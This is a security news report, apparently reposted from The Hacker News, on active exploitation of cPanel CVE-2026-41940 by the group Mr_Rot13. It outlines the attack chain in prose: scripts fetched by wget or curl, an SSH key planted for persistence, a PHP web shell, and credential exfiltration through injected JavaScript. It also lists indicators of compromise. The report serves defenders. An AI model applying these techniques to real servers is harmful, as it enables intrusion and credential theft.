cPanel CVE-2026-41940 Under Active Exploitation to Deploy Filemanager Backdoor

Source: The Hacker News

A threat actor known as Mr_Rot13 has been actively exploiting the recently disclosed critical cPanel vulnerability CVE‑2026‑41940 to deploy a backdoor dubbed Filemanager on compromised systems.

Vulnerability Overview

• CVE‑2026‑41940 affects cPanel and WebHost Manager (WHM).
• The flaw allows an authentication bypass, enabling remote attackers to gain elevated control of the control panel.
• Details are available in the original report on The Hacker News.

Threat Actor Attribution

Research from QiAnXin XLab links the exploitation to the group Mr_Rot13, a six‑year‑old hacker collective that has weaponized this flaw shortly after its public disclosure.

“Monitoring data shows that more than 2,000 attacker source IPs worldwide are currently involved in automated attacks and cyber‑crime activities targeting this vulnerability,” the XLab team noted.
The IPs are primarily sourced from Germany, the United States, Brazil, the Netherlands, and other regions.

Exploitation Mechanics

1. Initial delivery – A shell script is fetched via wget or curl from the domain wpsock.com.
2. Downloader – The script retrieves a Go‑based infector hosted at cp.dene.[de[.]com.
3. Persistence – The infector installs an SSH public key on the compromised cPanel server for long‑term access.
4. Web shell deployment – A PHP web shell is dropped, providing file upload/download and remote command execution capabilities.
5. Credential harvesting – The web shell injects JavaScript that serves a fake login page. Captured credentials are exfiltrated to a ROT13‑encoded domain wrned.com (see the ROT13 Wikipedia page).
6. Backdoor installation – The final payload is a cross‑platform backdoor (Windows, macOS, Linux) that supports full file management and shell functionality.

Indicators of Compromise (IOCs)

• Malicious domains

  • wpsock.com – delivery of the initial shell script.
  • cp.dene.[de[.]com – host of the Go infector.
  • wrned.com – ROT13‑encoded C2 for credential exfiltration.

• Files

  • helper.php – PHP backdoor observed on VirusTotal (uploaded April 2022).
  • Various PHP web shells used for file management and command execution.

• C2 channel – A Telegram group (3 members) managed by user 0xWR where harvested data (bash history, SSH keys, device info, database passwords, cPanel virtual aliases) is posted.

• IP activity – Over 2,000 source IPs across multiple continents, with notable concentrations in Germany, the US, Brazil, and the Netherlands.

Historical Context

• The C2 domain embedded in the malicious JavaScript was first registered in October 2020.
• The same domain appeared in a PHP backdoor (helper.php) uploaded to VirusTotal in April 2022.
• XLab reports that detection rates for Mr_Rot13‑related samples have remained extremely low across security products over the past six years.

---

All referenced images and links are retained from the original article.